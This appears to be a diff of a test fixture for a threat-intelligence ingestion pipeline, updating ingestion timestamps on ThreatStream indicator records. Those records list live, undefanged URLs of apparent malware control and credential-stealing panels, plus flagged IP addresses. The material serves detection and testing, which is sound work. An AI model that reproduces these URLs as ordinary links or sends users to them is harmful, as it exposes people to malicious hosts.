@@ -25987,7 +25987,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025913700Z", + "ingested": "2021-12-14T14:57:43.118418382Z", "original": "{\"created\":\"2020-02-22T02:52:53.756Z\",\"description\":\"TS ID: 55335562495; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--d5b42516-dfa2-499d-bc2b-c5c10617e7c9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:52:53.756Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/frega/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:53.756Z\"}", "category": "threat", "type": "indicator", @@ -26039,7 +26039,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025920400Z", + "ingested": "2021-12-14T14:57:43.118419222Z", "original": "{\"created\":\"2020-02-22T02:52:53.779Z\",\"description\":\"TS ID: 55335562482; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--0668db3a-adb5-4e2e-b8f2-18e3870e2d7c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-22T02:52:53.779Z\",\"name\":\"mal_url: http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:53.779Z\"}", "category": "threat", "type": "indicator", 
@@ -26091,7 +26091,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025927100Z", + "ingested": "2021-12-14T14:57:43.118419691Z", "original": "{\"created\":\"2020-02-22T02:52:59.853Z\",\"description\":\"TS ID: 55335562401; iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime\",\"id\":\"indicator--679fd604-82cb-47cd-a968-e87e9cca7fac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-22T02:52:59.853Z\",\"name\":\"mal_url: http://89.160.20.156/mpdu/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/mpdu/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:59.853Z\"}", "category": "threat", "type": "indicator", @@ -26136,7 +26136,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025933600Z", + "ingested": "2021-12-14T14:57:43.118420127Z", "original": "{\"created\":\"2020-02-22T02:53:10.018Z\",\"description\":\"TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--cdbffa12-c6c9-4723-807f-46b9672a23a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-22T02:53:10.018Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:10.018Z\"}", "category": "threat", "type": "indicator", 
@@ -26188,7 +26188,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025940400Z", + "ingested": "2021-12-14T14:57:43.118420643Z", "original": "{\"created\":\"2020-02-22T02:53:11.62Z\",\"description\":\"TS ID: 55335562491; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--2218c7b6-3e94-4885-9a70-1f724d8453cc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-22T02:53:11.62Z\",\"name\":\"mal_url: http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:11.62Z\"}", "category": "threat", "type": "indicator", @@ -26240,7 +26240,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025947300Z", + "ingested": "2021-12-14T14:57:43.118421127Z", "original": "{\"created\":\"2020-02-22T02:53:34.685Z\",\"description\":\"TS ID: 55335562511; iType: mal_url; State: active; Org: T-Mobile Czech Republic; Source: CyberCrime\",\"id\":\"indicator--773fabfe-63b5-4681-8189-4dffad1747fc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-46\"],\"modified\":\"2020-02-22T02:53:34.685Z\",\"name\":\"mal_url: http://ccilfov.ro/css/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ccilfov.ro/css/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.685Z\"}", "category": "threat", "type": "indicator", 
@@ -26285,7 +26285,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025954Z", + "ingested": "2021-12-14T14:57:43.118421515Z", "original": "{\"created\":\"2020-02-22T02:53:34.733Z\",\"description\":\"TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime\",\"id\":\"indicator--5e32213f-5daa-4181-a108-0fc58482adcb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:53:34.733Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.733Z\"}", "category": "threat", "type": "indicator", @@ -26337,7 +26337,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025959200Z", + "ingested": "2021-12-14T14:57:43.118421898Z", "original": "{\"created\":\"2020-02-22T02:53:34.767Z\",\"description\":\"TS ID: 55335562468; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--b07ae083-b56c-48b0-bfdb-6cf786978ce8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:53:34.767Z\",\"name\":\"mal_url: http://nortonlilly.info/zeya/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/zeya/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.767Z\"}", "category": "threat", "type": "indicator", 
@@ -26389,7 +26389,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025962400Z", + "ingested": "2021-12-14T14:57:43.118422298Z", "original": "{\"created\":\"2020-02-22T02:53:36.179Z\",\"description\":\"TS ID: 55335562472; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--42e0fb49-dd09-4979-a4d0-ff310d14acf8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:53:36.179Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/adaba/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/adaba/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:36.179Z\"}", "category": "threat", "type": "indicator", @@ -26441,7 +26441,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025967200Z", + "ingested": "2021-12-14T14:57:43.118422684Z", "original": "{\"created\":\"2020-02-22T02:53:45.219Z\",\"description\":\"TS ID: 55335562429; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--8d2d349a-763b-406b-ba8c-8ba684058028\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-22T02:53:45.219Z\",\"name\":\"mal_url: http://51.83.200.179/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://51.83.200.179/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:45.219Z\"}", "category": "threat", "type": "indicator", 
@@ -26493,7 +26493,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025972200Z", + "ingested": "2021-12-14T14:57:43.118423067Z", "original": "{\"created\":\"2020-02-22T02:53:56.922Z\",\"description\":\"TS ID: 55335562488; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--965a2554-cc08-488c-8d81-a29e8402eec1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-22T02:53:56.922Z\",\"name\":\"mal_url: http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:56.922Z\"}", "category": "threat", "type": "indicator", @@ -26545,7 +26545,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025978100Z", + "ingested": "2021-12-14T14:57:43.118423543Z", "original": "{\"created\":\"2020-02-22T02:54:18.93Z\",\"description\":\"TS ID: 55335562502; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--e75aa726-cbb0-486f-ac25-947fc76fb5de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-22T02:54:18.93Z\",\"name\":\"mal_url: http://paperblank.best/gHL6qufBKIulnp11/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://paperblank.best/gHL6qufBKIulnp11/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:18.93Z\"}", "category": "threat", "type": "indicator", 
@@ -26590,7 +26590,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025981700Z", + "ingested": "2021-12-14T14:57:43.118423979Z", "original": "{\"created\":\"2020-02-22T02:54:18.975Z\",\"description\":\"TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--9f6d9425-fc79-4493-8f95-81ac2a7ae188\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-22T02:54:18.975Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:18.975Z\"}", "category": "threat", "type": "indicator", @@ -26642,7 +26642,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025986500Z", + "ingested": "2021-12-14T14:57:43.118424456Z", "original": "{\"created\":\"2020-02-22T02:54:27.432Z\",\"description\":\"TS ID: 55335562494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--1333f7e6-3af0-4aea-b798-a54f03d68ac5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:54:27.432Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/frega2/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega2/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:27.432Z\"}", "category": "threat", "type": "indicator", 
@@ -26694,7 +26694,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025991100Z", + "ingested": "2021-12-14T14:57:43.118425102Z", "original": "{\"created\":\"2020-02-22T02:54:27.479Z\",\"description\":\"TS ID: 55335562474; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--f4e076ed-6393-49d5-adc2-cbe730ff48db\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:54:27.479Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/beta/herm/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/beta/herm/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:27.479Z\"}", "category": "threat", "type": "indicator", @@ -26746,7 +26746,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025995100Z", + "ingested": "2021-12-14T14:57:43.118425537Z", "original": "{\"created\":\"2020-02-22T02:54:29.634Z\",\"description\":\"TS ID: 55335562505; iType: mal_url; State: active; Org: ChunkHost; Source: CyberCrime\",\"id\":\"indicator--2b38be23-b226-460e-9b17-4480e930f271\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:54:29.634Z\",\"name\":\"mal_url: http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:29.634Z\"}", "category": "threat", "type": "indicator", 
@@ -26798,7 +26798,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025999300Z", + "ingested": "2021-12-14T14:57:43.118425966Z", "original": "{\"created\":\"2020-02-22T02:54:29.689Z\",\"description\":\"TS ID: 55335562500; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--0bfd644c-62ef-4f03-9d1d-304673d912f1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-22T02:54:29.689Z\",\"name\":\"mal_url: http://pay-robokassa.net/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pay-robokassa.net/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:29.689Z\"}", "category": "threat", "type": "indicator", @@ -26850,7 +26850,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026002700Z", + "ingested": "2021-12-14T14:57:43.118426429Z", "original": "{\"created\":\"2020-02-22T02:54:47.42Z\",\"description\":\"TS ID: 55335562476; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--a15df968-dec6-4122-811e-1144011d0653\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:54:47.42Z\",\"name\":\"mal_url: http://nortonlilly.info/jb/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/jb/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:47.42Z\"}", "category": "threat", "type": "indicator", 
@@ -26902,7 +26902,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026007500Z", + "ingested": "2021-12-14T14:57:43.118427117Z", "original": "{\"created\":\"2020-02-22T02:54:48.824Z\",\"description\":\"TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime\",\"id\":\"indicator--11fec449-039c-4d64-aefa-210e96074633\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-40\"],\"modified\":\"2020-02-22T02:54:48.824Z\",\"name\":\"mal_url: http://89.160.20.156/host/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/host/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:48.824Z\"}", "category": "threat", "type": "indicator", @@ -26954,7 +26954,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026014500Z", + "ingested": "2021-12-14T14:57:43.118427505Z", "original": "{\"created\":\"2020-02-22T02:54:49.84Z\",\"description\":\"TS ID: 55335562466; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--5d04eb73-cda3-4f22-bcaf-604660d26343\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:54:49.84Z\",\"name\":\"mal_url: http://nortonlilly.info/ace1/st/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/ace1/st/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:49.84Z\"}", "category": "threat", "type": "indicator", 
@@ -27006,7 +27006,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026018700Z", + "ingested": "2021-12-14T14:57:43.118427895Z", "original": "{\"created\":\"2020-02-22T02:54:51.052Z\",\"description\":\"TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime\",\"id\":\"indicator--f7bafcb3-679f-4959-8ed0-d3d8b62eceef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-22T02:54:51.052Z\",\"name\":\"mal_url: http://89.160.20.156/primfive/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/primfive/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:51.052Z\"}", "category": "threat", "type": "indicator", @@ -27058,7 +27058,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026047100Z", + "ingested": "2021-12-14T14:57:43.118428391Z", "original": "{\"created\":\"2020-02-22T02:54:51.08Z\",\"description\":\"TS ID: 55335562469; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--4913d346-5153-40a6-b5ab-9854e91f4ac6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:54:51.08Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/gold/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/gold/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:51.08Z\"}", "category": "threat", "type": "indicator", 
@@ -27110,7 +27110,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026050900Z", + "ingested": "2021-12-14T14:57:43.118428799Z", "original": "{\"created\":\"2020-02-22T02:54:57.998Z\",\"description\":\"TS ID: 55335562501; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--abd1ec0d-3831-4ae8-93fd-fa22ed4d20fd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-22T02:54:57.998Z\",\"name\":\"mal_url: http://dronius267.myjino.ru/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dronius267.myjino.ru/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:57.998Z\"}", "category": "threat", "type": "indicator", @@ -27162,7 +27162,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026056Z", + "ingested": "2021-12-14T14:57:43.118429260Z", "original": "{\"created\":\"2020-02-22T02:54:58.082Z\",\"description\":\"TS ID: 55335562493; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--21a62996-f4f5-4b77-be5d-4f84a7e7d084\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-22T02:54:58.082Z\",\"name\":\"mal_url: http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:58.082Z\"}", "category": "threat", "type": "indicator", 
@@ -27214,7 +27214,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026077900Z", + "ingested": "2021-12-14T14:57:43.118429705Z", "original": "{\"created\":\"2020-02-22T02:54:59.268Z\",\"description\":\"TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--7f70004c-d9ab-4f22-b3d8-511682528ccc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-22T02:54:59.268Z\",\"name\":\"mal_url: http://89.160.20.156/primsix/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/primsix/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:59.268Z\"}", "category": "threat", "type": "indicator", @@ -27266,7 +27266,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026084300Z", + "ingested": "2021-12-14T14:57:43.118430208Z", "original": "{\"created\":\"2020-02-22T02:54:59.71Z\",\"description\":\"TS ID: 55335562514; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--0c36d9c7-4938-49c0-9704-38aeaee90f95\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-22T02:54:59.71Z\",\"name\":\"mal_url: http://worldatdoor.in/nato/Pony/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/nato/Pony/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:59.71Z\"}", "category": "threat", "type": "indicator", 
@@ -27318,7 +27318,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026090200Z", + "ingested": "2021-12-14T14:57:43.118430650Z", "original": "{\"created\":\"2020-02-22T02:55:06.175Z\",\"description\":\"TS ID: 55335562464; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--af30a658-0eea-4daf-b26f-26f060e56bc9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:55:06.175Z\",\"name\":\"mal_url: http://nortonlilly.info/jp/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/jp/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:06.175Z\"}", "category": "threat", "type": "indicator", @@ -27370,7 +27370,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026118500Z", + "ingested": "2021-12-14T14:57:43.118431086Z", "original": "{\"created\":\"2020-02-22T02:55:16.703Z\",\"description\":\"TS ID: 55335562478; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--6c50747b-39c8-48c7-9fdc-86427a702ce1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-22T02:55:16.703Z\",\"name\":\"mal_url: http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:16.703Z\"}", "category": "threat", "type": "indicator", 
@@ -27421,7 +27421,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026122900Z", + "ingested": "2021-12-14T14:57:43.118431655Z", "original": "{\"created\":\"2020-02-22T02:55:26.13Z\",\"description\":\"TS ID: 55335562507; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime\",\"id\":\"indicator--a2d5be60-5ee7-4dc6-b626-f5af241f2da0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-45\"],\"modified\":\"2020-02-22T02:55:26.13Z\",\"name\":\"mal_url: http://67.215.224.144/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://67.215.224.144/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:26.13Z\"}", "category": "threat", "type": "indicator", @@ -27473,7 +27473,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026127400Z", + "ingested": "2021-12-14T14:57:43.118432172Z", "original": "{\"created\":\"2020-02-22T02:55:32.068Z\",\"description\":\"TS ID: 55335562512; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--d1c9a2c5-972d-4de3-97b5-c8175e4a0c4c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-22T02:55:32.068Z\",\"name\":\"mal_url: http://abyng.com/mg/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://abyng.com/mg/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:32.068Z\"}", "category": "threat", "type": "indicator", 
@@ -27518,7 +27518,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026132600Z", + "ingested": "2021-12-14T14:57:43.118432559Z", "original": "{\"created\":\"2020-02-22T02:55:34.073Z\",\"description\":\"TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--bb1eb654-4bcc-4292-a65d-879efac8ff18\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:55:34.073Z\",\"name\":\"mal_ip: 192.168.118.182\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.118.182']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:34.073Z\"}", "category": "threat", "type": "indicator", @@ -27563,7 +27563,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026136700Z", + "ingested": "2021-12-14T14:57:43.118432965Z", "original": "{\"created\":\"2020-02-22T02:55:37.882Z\",\"description\":\"TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--fdcefce4-18b5-4a39-9b8d-a8816fe4c411\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-22T02:55:37.882Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:37.882Z\"}", "category": "threat", "type": "indicator", 
